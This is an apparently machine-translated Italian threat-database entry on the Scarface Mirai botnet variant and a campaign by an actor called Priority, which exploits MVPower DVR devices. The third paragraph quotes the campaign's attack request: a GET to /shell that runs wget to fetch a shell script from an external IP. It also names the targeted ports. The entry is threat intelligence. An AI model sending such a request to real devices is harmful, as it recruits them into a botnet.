Threat Database Botnets Scarface Botnet

Scarface Botnet

Quando una minaccia malware ottiene il suo codice sorgente trapelato o rilasciato al pubblico dagli stessi sviluppatori, consente anche agli attori meno esperti di prenderlo, apportare modifiche per soddisfare meglio le loro esigenze e liberarlo in natura. Questo comportamento esatto è stato rilevato più volte da quando il codice della famigerata botnet Mirai è stato pubblicato sui forum degli hacker nel 2016.

Un attore di minacce che si identifica come Priorità è dietro una campagna di attacco che coinvolge due diverse varianti Mirai. Il primo payload distribuito era basato sulla variante Demonbot Mirai e si concentrava specificamente sugli attacchi Hadoop. Il secondo payload adottato più avanti nella campagna è molto più avanzato e si basa sulla variante Mirai sviluppata da Scarface. Scarface è un noto sviluppatore di malware che ha preso il codice Mirai e ha tentato di renderlo accessibile agli hacker inesperti più facilmente, adattando anche la minaccia di infettare i dispositivi Internet of Things (IoT).

La campagna Priority si concentra sulla scansione di diverse porte: 500, 5501, 5502, 5050 e 60001 e sull'attacco con un singolo comando con 'GET / shell? Cd% 20 / tmp;% 20wget% 20http: // 45 ( .) 13.58.4 / TPJ.sh; comando. Secondo gli analisti di infosec che hanno analizzato la campagna Priority, l'attaccante sembra avere un obiettivo specifico in mente perché prende di mira principalmente la porta 60001 mentre gli altri quattro servono più come distrazione che altro. Inoltre, hanno stabilito che Priority doveva essere piuttosto inesperto, evidenziato dal fatto che solo una singola vulnerabilità è stata sfruttata come vettore di compromesso: MVPower DVR Shell Unauthenticated Command Execution, invece della consueta quantità compresa tra 3 e 7 exploit trovati in altri simili minacce.

Tutti gli attacchi iniziali sono stati lanciati da un singolo indirizzo IP ospitato su un Virtual Private Server (VPS) fornito da Digital Ocean. Gli hacker ricorrono spesso a VPS a causa della flessibilità che forniscono nella configurazione rapida di un server e quindi nell'eliminazione altrettanto veloce.

Tendenza

I più visti

Caricamento in corso...